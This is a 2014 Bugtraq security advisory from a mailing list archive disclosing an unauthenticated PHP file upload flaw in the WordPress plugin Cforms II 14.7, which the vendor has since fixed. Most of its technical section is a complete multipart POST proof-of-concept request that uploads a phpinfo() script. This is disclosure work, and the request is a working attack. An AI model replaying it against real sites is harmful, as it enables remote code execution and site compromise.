| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 29 Dec 2014 20:12:09 GMT From: z.fedotkin@...osec.ru To: bugtraq@...urityfocus.com Subject: Remote Code Execution via Unauthorised File upload in Cforms 14.7 Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7 Advisory ID: - Author: Zakhar Fedotkin Affected Software: Wordpress Plugin Cforms II 14.x-14.7 (Release: 12th Nov 2014) Vendor URL: https://wordpress.org/plugins/cforms2/ Vendor Status: fixed CVE-ID: - ========================== Vulnerability Description: ========================== The Cforms 14.7 and before are vulnerable to unauthorised user file upload. It's affected contact forms thats was created without file upload box. File lib_nonajax.php accept files with all extensions, that could lead to remote code execution ================== Technical Details: ================== POC: Request to the valid contact form looks like: POST /wordpress/ HTTP/1.1 .. Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------13530703071348311666826727318 Content-Length: 1747 -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf2_field_1" -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf2_field_2" test -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf2_field_3" test@...t.com -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf2_field_4" http:// -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf_uploadfile2[]"; filename="up.php" Content-Type: text/php <? phpinfo(); ?> -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf_working2" <span>One%20moment%20please...</span> -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf_failure2" <span>Please%20fill%20in%20all%20the%20required%20fields.</span> -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf_codeerr2" <span>Please%20double-check%20your%20verification%20code.</span> -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf_customerr2" yyy -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="cf_popup2" nn -----------------------------13530703071348311666826727318 Content-Disposition: form-data; name="sendbutton2" 1 -----------------------------13530703071348311666826727318-- The error is in lib_nonajax.php and default settings lib_nonajax.php allow to upload files to the default directory for versions below 14..6.3 it is cfroms plugin home directory. For version 14.6.3 and after it is wordpress upload directory. Default settings for contact form without upload field is None, so it's possible to upload *.php file. ========= Solution: ========= Update to the latest version ==================== Disclosure Timeline: ==================== 15-Dec-2014 ? found the vulnerability 22-Dec-2014 - informed the developers 23-Dec-2014 - response by vendor 27-Dec-2014 ? fix by vendor 29-Dec-2014 - release date of this security advisory 29-Dec-2014 - post on Bugtraq ======== Credits: ======== Vulnerability found and advisory written by Zakhar Fedotkin. =========== References: =========== https://wordpress.org/plugins/cforms2/ http://infosec.ru
Powered by blists - more mailing lists